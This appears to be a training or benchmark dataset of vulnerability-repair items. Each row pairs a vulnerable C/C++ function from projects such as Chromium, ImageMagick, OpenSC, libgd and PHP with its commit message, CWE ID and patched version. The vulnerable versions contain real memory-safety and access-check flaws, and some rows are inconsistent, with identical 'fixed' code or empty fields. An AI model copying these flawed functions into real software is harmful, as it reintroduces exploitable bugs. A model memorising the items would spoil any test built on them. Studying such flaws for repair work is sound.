Columns:

  column               type            values
  instruction          stringclasses   1 value
  input                stringlengths   90 to 139k
  output               stringlengths   16 to 138k
  __index_level_0__    int64           165k to 175k
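The rows below follow this four-column layout. As a quick illustration of working with it, here is a minimal sketch that loads a JSON Lines export of the dataset with the Hugging Face `datasets` library and inspects one record; the file name `vulnerability_fix_dataset.jsonl` is a placeholder, not the dataset's actual path.

```python
# Minimal sketch: load a JSON Lines export of this dataset and inspect one row.
# "vulnerability_fix_dataset.jsonl" is a placeholder path, not the real file name.
from datasets import load_dataset

ds = load_dataset("json", data_files="vulnerability_fix_dataset.jsonl", split="train")

row = ds[0]
print(row["instruction"][:80])       # the single shared prompt string
print(len(row["input"]))             # vulnerable code + commit message + CWE ID
print(len(row["output"]))            # the fixed function only
print(row["__index_level_0__"])      # integer index, roughly 165k to 175k
```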
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: const Extension* ExtensionAppItem::GetExtension() const { const ExtensionService* service = extensions::ExtensionSystem::Get(profile_)->extension_service(); const Extension* extension = service->GetInstalledExtension(extension_id_); return extension; } Commit Message: [Extensions] Add GetInstalledExtension() method to ExtensionRegistry This CL adds GetInstalledExtension() method to ExtensionRegistry and uses it instead of deprecated ExtensionService::GetInstalledExtension() in chrome/browser/ui/app_list/. Part of removing the deprecated GetInstalledExtension() call from the ExtensionService. BUG=489687 Review URL: https://codereview.chromium.org/1130353010 Cr-Commit-Position: refs/heads/master@{#333036} CWE ID:
const Extension* ExtensionAppItem::GetExtension() const { const extensions::ExtensionRegistry* registry = extensions::ExtensionRegistry::Get(profile_); const Extension* extension = registry->GetInstalledExtension( extension_id_); return extension; }
171,723
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void Browser::ToggleFullscreenModeForTab(TabContents* tab, bool enter_fullscreen) { if (tab != GetSelectedTabContents()) return; fullscreened_tab_ = enter_fullscreen ? TabContentsWrapper::GetCurrentWrapperForContents(tab) : NULL; if (enter_fullscreen && !window_->IsFullscreen()) tab_caused_fullscreen_ = true; if (tab_caused_fullscreen_) ToggleFullscreenMode(); } Commit Message: Implement a bubble that appears at the top of the screen when a tab enters fullscreen mode via webkitRequestFullScreen(), telling the user how to exit fullscreen. This is implemented as an NSView rather than an NSWindow because the floating chrome that appears in presentation mode should overlap the bubble. Content-initiated fullscreen mode makes use of 'presentation mode' on the Mac: the mode in which the UI is hidden, accessible by moving the cursor to the top of the screen. On Snow Leopard, this mode is synonymous with fullscreen mode. On Lion, however, fullscreen mode does not imply presentation mode: in non-presentation fullscreen mode, the chrome is permanently shown. It is possible to switch between presentation mode and fullscreen mode using the presentation mode UI control. When a tab initiates fullscreen mode on Lion, we enter presentation mode if not in presentation mode already. When the user exits fullscreen mode using Chrome UI (i.e. keyboard shortcuts, menu items, buttons, switching tabs, etc.) we return the user to the mode they were in before the tab entered fullscreen. BUG=14471 TEST=Enter fullscreen mode using webkitRequestFullScreen. You should see a bubble pop down from the top of the screen. Need to test the Lion logic somehow, with no Lion trybots. BUG=96883 Original review http://codereview.chromium.org/7890056/ TBR=thakis Review URL: http://codereview.chromium.org/7920024 git-svn-id: svn://svn.chromium.org/chrome/trunk/src@101624 0039d316-1c4b-4281-b951-d872f2087c98 CWE ID: CWE-119
void Browser::ToggleFullscreenModeForTab(TabContents* tab, bool enter_fullscreen) { if (tab != GetSelectedTabContents()) return; fullscreened_tab_ = enter_fullscreen ? TabContentsWrapper::GetCurrentWrapperForContents(tab) : NULL; bool in_correct_mode_for_tab_fullscreen; #if defined(OS_MACOSX) in_correct_mode_for_tab_fullscreen = window_->InPresentationMode(); #else in_correct_mode_for_tab_fullscreen = window_->IsFullscreen(); #endif if (enter_fullscreen && !in_correct_mode_for_tab_fullscreen) tab_caused_fullscreen_ = true; if (tab_caused_fullscreen_) { #if defined(OS_MACOSX) TogglePresentationMode(); #else ToggleFullscreenMode(); #endif } }
170,252
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static Image *ReadAAIImage(const ImageInfo *image_info,ExceptionInfo *exception) { Image *image; MagickBooleanType status; register ssize_t x; register PixelPacket *q; register unsigned char *p; size_t height, length, width; ssize_t count, y; unsigned char *pixels; /* Open image file. */ assert(image_info != (const ImageInfo *) NULL); assert(image_info->signature == MagickSignature); if (image_info->debug != MagickFalse) (void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s", image_info->filename); assert(exception != (ExceptionInfo *) NULL); assert(exception->signature == MagickSignature); image=AcquireImage(image_info); status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception); if (status == MagickFalse) { image=DestroyImageList(image); return((Image *) NULL); } /* Read AAI Dune image. */ width=ReadBlobLSBLong(image); height=ReadBlobLSBLong(image); if (EOFBlob(image) != MagickFalse) ThrowReaderException(CorruptImageError,"ImproperImageHeader"); if ((width == 0UL) || (height == 0UL)) ThrowReaderException(CorruptImageError,"ImproperImageHeader"); do { /* Convert AAI raster image to pixel packets. */ image->columns=width; image->rows=height; image->depth=8; if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0)) if (image->scene >= (image_info->scene+image_info->number_scenes-1)) break; pixels=(unsigned char *) AcquireQuantumMemory(image->columns, 4*sizeof(*pixels)); if (pixels == (unsigned char *) NULL) ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed"); length=(size_t) 4*image->columns; for (y=0; y < (ssize_t) image->rows; y++) { count=ReadBlob(image,length,pixels); if ((size_t) count != length) ThrowReaderException(CorruptImageError,"UnableToReadImageData"); p=pixels; q=QueueAuthenticPixels(image,0,y,image->columns,1,exception); if (q == (PixelPacket *) NULL) break; for (x=0; x < (ssize_t) image->columns; x++) { SetPixelBlue(q,ScaleCharToQuantum(*p++)); SetPixelGreen(q,ScaleCharToQuantum(*p++)); SetPixelRed(q,ScaleCharToQuantum(*p++)); if (*p == 254) *p=255; SetPixelAlpha(q,ScaleCharToQuantum(*p++)); if (q->opacity != OpaqueOpacity) image->matte=MagickTrue; q++; } if (SyncAuthenticPixels(image,exception) == MagickFalse) break; if (image->previous == (Image *) NULL) { status=SetImageProgress(image,LoadImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } } pixels=(unsigned char *) RelinquishMagickMemory(pixels); if (EOFBlob(image) != MagickFalse) { ThrowFileException(exception,CorruptImageError,"UnexpectedEndOfFile", image->filename); break; } /* Proceed to next image. */ if (image_info->number_scenes != 0) if (image->scene >= (image_info->scene+image_info->number_scenes-1)) break; width=ReadBlobLSBLong(image); height=ReadBlobLSBLong(image); if ((width != 0UL) && (height != 0UL)) { /* Allocate next image structure. */ AcquireNextImage(image_info,image); if (GetNextImageInList(image) == (Image *) NULL) { image=DestroyImageList(image); return((Image *) NULL); } image=SyncNextImageInList(image); status=SetImageProgress(image,LoadImagesTag,TellBlob(image), GetBlobSize(image)); if (status == MagickFalse) break; } } while ((width != 0UL) && (height != 0UL)); (void) CloseBlob(image); return(GetFirstImageInList(image)); } Commit Message: CWE ID: CWE-119
static Image *ReadAAIImage(const ImageInfo *image_info,ExceptionInfo *exception) { Image *image; MagickBooleanType status; register ssize_t x; register PixelPacket *q; register unsigned char *p; size_t height, length, width; ssize_t count, y; unsigned char *pixels; /* Open image file. */ assert(image_info != (const ImageInfo *) NULL); assert(image_info->signature == MagickSignature); if (image_info->debug != MagickFalse) (void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s", image_info->filename); assert(exception != (ExceptionInfo *) NULL); assert(exception->signature == MagickSignature); image=AcquireImage(image_info); status=OpenBlob(image_info,image,ReadBinaryBlobMode,exception); if (status == MagickFalse) { image=DestroyImageList(image); return((Image *) NULL); } /* Read AAI Dune image. */ width=ReadBlobLSBLong(image); height=ReadBlobLSBLong(image); if (EOFBlob(image) != MagickFalse) ThrowReaderException(CorruptImageError,"ImproperImageHeader"); if ((width == 0UL) || (height == 0UL)) ThrowReaderException(CorruptImageError,"ImproperImageHeader"); do { /* Convert AAI raster image to pixel packets. */ image->columns=width; image->rows=height; image->depth=8; if ((image_info->ping != MagickFalse) && (image_info->number_scenes != 0)) if (image->scene >= (image_info->scene+image_info->number_scenes-1)) break; status=SetImageExtent(image,image->columns,image->rows); if (status == MagickFalse) { InheritException(exception,&image->exception); return(DestroyImageList(image)); } pixels=(unsigned char *) AcquireQuantumMemory(image->columns, 4*sizeof(*pixels)); if (pixels == (unsigned char *) NULL) ThrowReaderException(ResourceLimitError,"MemoryAllocationFailed"); length=(size_t) 4*image->columns; for (y=0; y < (ssize_t) image->rows; y++) { count=ReadBlob(image,length,pixels); if ((size_t) count != length) ThrowReaderException(CorruptImageError,"UnableToReadImageData"); p=pixels; q=QueueAuthenticPixels(image,0,y,image->columns,1,exception); if (q == (PixelPacket *) NULL) break; for (x=0; x < (ssize_t) image->columns; x++) { SetPixelBlue(q,ScaleCharToQuantum(*p++)); SetPixelGreen(q,ScaleCharToQuantum(*p++)); SetPixelRed(q,ScaleCharToQuantum(*p++)); if (*p == 254) *p=255; SetPixelAlpha(q,ScaleCharToQuantum(*p++)); if (q->opacity != OpaqueOpacity) image->matte=MagickTrue; q++; } if (SyncAuthenticPixels(image,exception) == MagickFalse) break; if (image->previous == (Image *) NULL) { status=SetImageProgress(image,LoadImageTag,(MagickOffsetType) y, image->rows); if (status == MagickFalse) break; } } pixels=(unsigned char *) RelinquishMagickMemory(pixels); if (EOFBlob(image) != MagickFalse) { ThrowFileException(exception,CorruptImageError,"UnexpectedEndOfFile", image->filename); break; } /* Proceed to next image. */ if (image_info->number_scenes != 0) if (image->scene >= (image_info->scene+image_info->number_scenes-1)) break; width=ReadBlobLSBLong(image); height=ReadBlobLSBLong(image); if ((width != 0UL) && (height != 0UL)) { /* Allocate next image structure. */ AcquireNextImage(image_info,image); if (GetNextImageInList(image) == (Image *) NULL) { image=DestroyImageList(image); return((Image *) NULL); } image=SyncNextImageInList(image); status=SetImageProgress(image,LoadImagesTag,TellBlob(image), GetBlobSize(image)); if (status == MagickFalse) break; } } while ((width != 0UL) && (height != 0UL)); (void) CloseBlob(image); return(GetFirstImageInList(image)); }
168,546
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static int entersafe_gen_key(sc_card_t *card, sc_entersafe_gen_key_data *data) { int r; size_t len = data->key_length >> 3; sc_apdu_t apdu; u8 rbuf[300]; u8 sbuf[4],*p; SC_FUNC_CALLED(card->ctx, SC_LOG_DEBUG_VERBOSE); /* MSE */ sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x22, 0x01, 0xB8); apdu.lc=0x04; sbuf[0]=0x83; sbuf[1]=0x02; sbuf[2]=data->key_id; sbuf[3]=0x2A; apdu.data = sbuf; apdu.datalen=4; apdu.lc=4; apdu.le=0; r=entersafe_transmit_apdu(card, &apdu, 0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe set MSE failed"); /* generate key */ sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x46, 0x00, 0x00); apdu.le = 0; sbuf[0] = (u8)(data->key_length >> 8); sbuf[1] = (u8)(data->key_length); apdu.data = sbuf; apdu.lc = 2; apdu.datalen = 2; r = entersafe_transmit_apdu(card, &apdu,0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe generate keypair failed"); /* read public key via READ PUBLIC KEY */ sc_format_apdu(card, &apdu, SC_APDU_CASE_2_SHORT, 0xE6, 0x2A, data->key_id); apdu.cla = 0x80; apdu.resp = rbuf; apdu.resplen = sizeof(rbuf); apdu.le = 256; r = entersafe_transmit_apdu(card, &apdu,0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe get pukey failed"); data->modulus = malloc(len); if (!data->modulus) SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,SC_ERROR_OUT_OF_MEMORY); p=rbuf; assert(*p=='E'); p+=2+p[1]; /* N */ assert(*p=='N'); ++p; if(*p++>0x80) { u8 len_bytes=(*(p-1))&0x0f; size_t module_len=0; while(len_bytes!=0) { module_len=module_len<<8; module_len+=*p++; --len_bytes; } } entersafe_reverse_buffer(p,len); memcpy(data->modulus,p,len); SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,SC_SUCCESS); } Commit Message: fixed out of bounds reads Thanks to Eric Sesterhenn from X41 D-SEC GmbH for reporting and suggesting security fixes. CWE ID: CWE-125
static int entersafe_gen_key(sc_card_t *card, sc_entersafe_gen_key_data *data) { int r; size_t len = data->key_length >> 3; sc_apdu_t apdu; u8 rbuf[300]; u8 sbuf[4],*p; SC_FUNC_CALLED(card->ctx, SC_LOG_DEBUG_VERBOSE); /* MSE */ sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x22, 0x01, 0xB8); apdu.lc=0x04; sbuf[0]=0x83; sbuf[1]=0x02; sbuf[2]=data->key_id; sbuf[3]=0x2A; apdu.data = sbuf; apdu.datalen=4; apdu.lc=4; apdu.le=0; r=entersafe_transmit_apdu(card, &apdu, 0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe set MSE failed"); /* generate key */ sc_format_apdu(card, &apdu, SC_APDU_CASE_3_SHORT, 0x46, 0x00, 0x00); apdu.le = 0; sbuf[0] = (u8)(data->key_length >> 8); sbuf[1] = (u8)(data->key_length); apdu.data = sbuf; apdu.lc = 2; apdu.datalen = 2; r = entersafe_transmit_apdu(card, &apdu,0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe generate keypair failed"); /* read public key via READ PUBLIC KEY */ sc_format_apdu(card, &apdu, SC_APDU_CASE_2_SHORT, 0xE6, 0x2A, data->key_id); apdu.cla = 0x80; apdu.resp = rbuf; apdu.resplen = sizeof(rbuf); apdu.le = 256; r = entersafe_transmit_apdu(card, &apdu,0,0,0,0); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, r, "APDU transmit failed"); SC_TEST_RET(card->ctx, SC_LOG_DEBUG_NORMAL, sc_check_sw(card,apdu.sw1,apdu.sw2),"EnterSafe get pukey failed"); data->modulus = malloc(len); if (!data->modulus) SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, SC_ERROR_OUT_OF_MEMORY); p=rbuf; if (*p!='E') SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, SC_ERROR_INVALID_DATA); p+=2+p[1]; /* N */ if (*p!='N') SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE, SC_ERROR_INVALID_DATA); ++p; if(*p++>0x80) { u8 len_bytes=(*(p-1))&0x0f; size_t module_len=0; while(len_bytes!=0) { module_len=module_len<<8; module_len+=*p++; --len_bytes; } } entersafe_reverse_buffer(p,len); memcpy(data->modulus,p,len); SC_FUNC_RETURN(card->ctx, SC_LOG_DEBUG_VERBOSE,SC_SUCCESS); }
169,052
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: void DataReductionProxyConfig::InitializeOnIOThread( scoped_refptr<network::SharedURLLoaderFactory> url_loader_factory, WarmupURLFetcher::CreateCustomProxyConfigCallback create_custom_proxy_config_callback, NetworkPropertiesManager* manager) { DCHECK(thread_checker_.CalledOnValidThread()); network_properties_manager_ = manager; network_properties_manager_->ResetWarmupURLFetchMetrics(); secure_proxy_checker_.reset(new SecureProxyChecker(url_loader_factory)); warmup_url_fetcher_.reset(new WarmupURLFetcher( url_loader_factory, create_custom_proxy_config_callback, base::BindRepeating( &DataReductionProxyConfig::HandleWarmupFetcherResponse, base::Unretained(this)), base::BindRepeating(&DataReductionProxyConfig::GetHttpRttEstimate, base::Unretained(this)), ui_task_runner_)); if (ShouldAddDefaultProxyBypassRules()) AddDefaultProxyBypassRules(); network_connection_tracker_->AddNetworkConnectionObserver(this); network_connection_tracker_->GetConnectionType( &connection_type_, base::BindOnce(&DataReductionProxyConfig::OnConnectionChanged, weak_factory_.GetWeakPtr())); } Commit Message: Implicitly bypass localhost when proxying requests. This aligns Chrome's behavior with the Windows and macOS proxy resolvers (but not Firefox). Concretely: * localhost names (as determined by net::IsLocalhost) now implicitly bypass the proxy * link-local IP addresses implicitly bypass the proxy The implicit rules are handled by ProxyBypassRules, and it is possible to override them when manually configuring proxy settings (but not when using PAC or auto-detect). This change also adds support for the "<-loopback>" proxy bypass rule, with similar semantics as it has on Windows (removes the implicit bypass rules for localhost and link-local). The compatibility risk of this change should be low as proxying through localhost was not universally supported. It is however an idiom used in testing (a number of our own tests had such a dependency). Impacted users can use the "<-loopback>" bypass rule as a workaround. Bug: 413511, 899126, 901896 Change-Id: I263ca21ef9f12d4759a20cb4751dc3261bda6ac0 Reviewed-on: https://chromium-review.googlesource.com/c/1303626 Commit-Queue: Eric Roman <eroman@chromium.org> Reviewed-by: Dominick Ng <dominickn@chromium.org> Reviewed-by: Tarun Bansal <tbansal@chromium.org> Reviewed-by: Matt Menke <mmenke@chromium.org> Reviewed-by: Sami Kyöstilä <skyostil@chromium.org> Cr-Commit-Position: refs/heads/master@{#606112} CWE ID: CWE-20
void DataReductionProxyConfig::InitializeOnIOThread( scoped_refptr<network::SharedURLLoaderFactory> url_loader_factory, WarmupURLFetcher::CreateCustomProxyConfigCallback create_custom_proxy_config_callback, NetworkPropertiesManager* manager) { DCHECK(thread_checker_.CalledOnValidThread()); network_properties_manager_ = manager; network_properties_manager_->ResetWarmupURLFetchMetrics(); secure_proxy_checker_.reset(new SecureProxyChecker(url_loader_factory)); warmup_url_fetcher_.reset(new WarmupURLFetcher( url_loader_factory, create_custom_proxy_config_callback, base::BindRepeating( &DataReductionProxyConfig::HandleWarmupFetcherResponse, base::Unretained(this)), base::BindRepeating(&DataReductionProxyConfig::GetHttpRttEstimate, base::Unretained(this)), ui_task_runner_)); AddDefaultProxyBypassRules(); network_connection_tracker_->AddNetworkConnectionObserver(this); network_connection_tracker_->GetConnectionType( &connection_type_, base::BindOnce(&DataReductionProxyConfig::OnConnectionChanged, weak_factory_.GetWeakPtr())); }
172,640
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: BlockEntry::Kind Track::EOSBlock::GetKind() const { return kBlockEOS; } Commit Message: libwebm: Pull from upstream Rolling mkvparser from upstream. Primarily for fixing a bug on parsing failures with certain Opus WebM files. Upstream commit hash of this pull: 574045edd4ecbeb802ee3f1d214b5510269852ae The diff is so huge because there were some style clean ups upstream. But it was ensured that there were no breaking changes when the style clean ups was done upstream. Change-Id: Ib6e907175484b4b0ae1b55ab39522ea3188ad039 CWE ID: CWE-119
BlockEntry::Kind Track::EOSBlock::GetKind() const { return kBlockEOS; }
174,331
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: psf_asciiheader_printf (SF_PRIVATE *psf, const char *format, ...) { va_list argptr ; int maxlen ; char *start ; maxlen = strlen ((char*) psf->header) ; start = ((char*) psf->header) + maxlen ; maxlen = sizeof (psf->header) - maxlen ; va_start (argptr, format) ; vsnprintf (start, maxlen, format, argptr) ; va_end (argptr) ; /* Make sure the string is properly terminated. */ start [maxlen - 1] = 0 ; psf->headindex = strlen ((char*) psf->header) ; return ; } /* psf_asciiheader_printf */ Commit Message: src/ : Move to a variable length header buffer Previously, the `psf->header` buffer was a fixed length specified by `SF_HEADER_LEN` which was set to `12292`. This was problematic for two reasons; this value was un-necessarily large for the majority of files and too small for some others. Now the size of the header buffer starts at 256 bytes and grows as necessary up to a maximum of 100k. CWE ID: CWE-119
psf_asciiheader_printf (SF_PRIVATE *psf, const char *format, ...) { va_list argptr ; int maxlen ; char *start ; maxlen = strlen ((char*) psf->header.ptr) ; start = ((char*) psf->header.ptr) + maxlen ; maxlen = psf->header.len - maxlen ; va_start (argptr, format) ; vsnprintf (start, maxlen, format, argptr) ; va_end (argptr) ; /* Make sure the string is properly terminated. */ start [maxlen - 1] = 0 ; psf->header.indx = strlen ((char*) psf->header.ptr) ; return ; } /* psf_asciiheader_printf */
170,063
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: ImageLoader::ImageLoader(Element* element) : m_element(element), m_derefElementTimer(this, &ImageLoader::timerFired), m_hasPendingLoadEvent(false), m_hasPendingErrorEvent(false), m_imageComplete(true), m_loadingImageDocument(false), m_elementIsProtected(false), m_suppressErrorEvents(false) { RESOURCE_LOADING_DVLOG(1) << "new ImageLoader " << this; } Commit Message: Move ImageLoader timer to frame-specific TaskRunnerTimer. Move ImageLoader timer m_derefElementTimer to frame-specific TaskRunnerTimer. This associates it with the frame's Networking timer task queue. BUG=624694 Review-Url: https://codereview.chromium.org/2642103002 Cr-Commit-Position: refs/heads/master@{#444927} CWE ID:
ImageLoader::ImageLoader(Element* element) : m_element(element), m_derefElementTimer(TaskRunnerHelper::get(TaskType::Networking, element->document().frame()), this, &ImageLoader::timerFired), m_hasPendingLoadEvent(false), m_hasPendingErrorEvent(false), m_imageComplete(true), m_loadingImageDocument(false), m_elementIsProtected(false), m_suppressErrorEvents(false) { RESOURCE_LOADING_DVLOG(1) << "new ImageLoader " << this; }
171,974
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: log_result (PolkitBackendInteractiveAuthority *authority, const gchar *action_id, PolkitSubject *subject, PolkitSubject *caller, PolkitAuthorizationResult *result) { PolkitBackendInteractiveAuthorityPrivate *priv; PolkitIdentity *user_of_subject; const gchar *log_result_str; gchar *subject_str; gchar *user_of_subject_str; gchar *caller_str; gchar *subject_cmdline; gchar *caller_cmdline; priv = POLKIT_BACKEND_INTERACTIVE_AUTHORITY_GET_PRIVATE (authority); log_result_str = "DENYING"; if (polkit_authorization_result_get_is_authorized (result)) log_result_str = "ALLOWING"; user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor, subject, NULL); subject_str = polkit_subject_to_string (subject); if (user_of_subject != NULL) user_of_subject_str = polkit_identity_to_string (user_of_subject); else user_of_subject_str = g_strdup ("<unknown>"); caller_str = polkit_subject_to_string (caller); subject_cmdline = _polkit_subject_get_cmdline (subject); if (subject_cmdline == NULL) subject_cmdline = g_strdup ("<unknown>"); caller_cmdline = _polkit_subject_get_cmdline (caller); if (caller_cmdline == NULL) caller_cmdline = g_strdup ("<unknown>"); polkit_backend_authority_log (POLKIT_BACKEND_AUTHORITY (authority), "%s action %s for %s [%s] owned by %s (check requested by %s [%s])", log_result_str, action_id, subject_str, subject_cmdline, user_of_subject_str, caller_str, caller_cmdline); if (user_of_subject != NULL) g_object_unref (user_of_subject); g_free (subject_str); g_free (user_of_subject_str); g_free (caller_str); g_free (subject_cmdline); g_free (caller_cmdline); } Commit Message: CWE ID: CWE-200
log_result (PolkitBackendInteractiveAuthority *authority, const gchar *action_id, PolkitSubject *subject, PolkitSubject *caller, PolkitAuthorizationResult *result) { PolkitBackendInteractiveAuthorityPrivate *priv; PolkitIdentity *user_of_subject; const gchar *log_result_str; gchar *subject_str; gchar *user_of_subject_str; gchar *caller_str; gchar *subject_cmdline; gchar *caller_cmdline; priv = POLKIT_BACKEND_INTERACTIVE_AUTHORITY_GET_PRIVATE (authority); log_result_str = "DENYING"; if (polkit_authorization_result_get_is_authorized (result)) log_result_str = "ALLOWING"; user_of_subject = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor, subject, NULL, NULL); subject_str = polkit_subject_to_string (subject); if (user_of_subject != NULL) user_of_subject_str = polkit_identity_to_string (user_of_subject); else user_of_subject_str = g_strdup ("<unknown>"); caller_str = polkit_subject_to_string (caller); subject_cmdline = _polkit_subject_get_cmdline (subject); if (subject_cmdline == NULL) subject_cmdline = g_strdup ("<unknown>"); caller_cmdline = _polkit_subject_get_cmdline (caller); if (caller_cmdline == NULL) caller_cmdline = g_strdup ("<unknown>"); polkit_backend_authority_log (POLKIT_BACKEND_AUTHORITY (authority), "%s action %s for %s [%s] owned by %s (check requested by %s [%s])", log_result_str, action_id, subject_str, subject_cmdline, user_of_subject_str, caller_str, caller_cmdline); if (user_of_subject != NULL) g_object_unref (user_of_subject); g_free (subject_str); g_free (user_of_subject_str); g_free (caller_str); g_free (subject_cmdline); g_free (caller_cmdline); }
165,287
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: PHP_FUNCTION(linkinfo) { char *link; size_t link_len; zend_stat_t sb; int ret; if (zend_parse_parameters(ZEND_NUM_ARGS(), "p", &link, &link_len) == FAILURE) { return; } ret = VCWD_STAT(link, &sb); if (ret == -1) { php_error_docref(NULL, E_WARNING, "%s", strerror(errno)); RETURN_LONG(Z_L(-1)); } RETURN_LONG((zend_long) sb.st_dev); } Commit Message: Fixed bug #76459 windows linkinfo lacks openbasedir check CWE ID: CWE-200
PHP_FUNCTION(linkinfo) { char *link; char *dirname; size_t link_len; zend_stat_t sb; int ret; if (zend_parse_parameters(ZEND_NUM_ARGS(), "p", &link, &link_len) == FAILURE) { return; } dirname = estrndup(link, link_len); php_dirname(dirname, link_len); if (php_check_open_basedir(dirname)) { efree(dirname); RETURN_FALSE; } ret = VCWD_STAT(link, &sb); if (ret == -1) { php_error_docref(NULL, E_WARNING, "%s", strerror(errno)); efree(dirname); RETURN_LONG(Z_L(-1)); } efree(dirname); RETURN_LONG((zend_long) sb.st_dev); }
169,107
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
Code: static inline LineContribType * _gdContributionsAlloc(unsigned int line_length, unsigned int windows_size) { unsigned int u = 0; LineContribType *res; int overflow_error = 0; res = (LineContribType *) gdMalloc(sizeof(LineContribType)); if (!res) { return NULL; } res->WindowSize = windows_size; res->LineLength = line_length; if (overflow2(line_length, sizeof(ContributionType))) { gdFree(res); return NULL; } res->ContribRow = (ContributionType *) gdMalloc(line_length * sizeof(ContributionType)); if (res->ContribRow == NULL) { gdFree(res); return NULL; } for (u = 0 ; u < line_length ; u++) { if (overflow2(windows_size, sizeof(double))) { overflow_error = 1; } else { res->ContribRow[u].Weights = (double *) gdMalloc(windows_size * sizeof(double)); } if (overflow_error == 1 || res->ContribRow[u].Weights == NULL) { unsigned int i; u--; for (i=0;i<=u;i++) { gdFree(res->ContribRow[i].Weights); } gdFree(res->ContribRow); gdFree(res); return NULL; } } return res; } Commit Message: Fix potential unsigned underflow No need to decrease `u`, so we don't do it. While we're at it, we also factor out the overflow check of the loop, what improves performance and readability. This issue has been reported by Stefan Esser to security@libgd.org. CWE ID: CWE-191
static inline LineContribType * _gdContributionsAlloc(unsigned int line_length, unsigned int windows_size) { unsigned int u = 0; LineContribType *res; size_t weights_size; if (overflow2(windows_size, sizeof(double))) { return NULL; } else { weights_size = windows_size * sizeof(double); } res = (LineContribType *) gdMalloc(sizeof(LineContribType)); if (!res) { return NULL; } res->WindowSize = windows_size; res->LineLength = line_length; if (overflow2(line_length, sizeof(ContributionType))) { gdFree(res); return NULL; } res->ContribRow = (ContributionType *) gdMalloc(line_length * sizeof(ContributionType)); if (res->ContribRow == NULL) { gdFree(res); return NULL; } for (u = 0 ; u < line_length ; u++) { res->ContribRow[u].Weights = (double *) gdMalloc(weights_size); if (res->ContribRow[u].Weights == NULL) { unsigned int i; for (i=0;i<u;i++) { gdFree(res->ContribRow[i].Weights); } gdFree(res->ContribRow); gdFree(res); return NULL; } } return res; }
168,511
Analyze the following vulnerable code snippet, the commit message, and the CWE ID. Determine the impact category of this vulnerability. Output the fixed function only. Remember, I want response with just the fixed code only, No explanation.
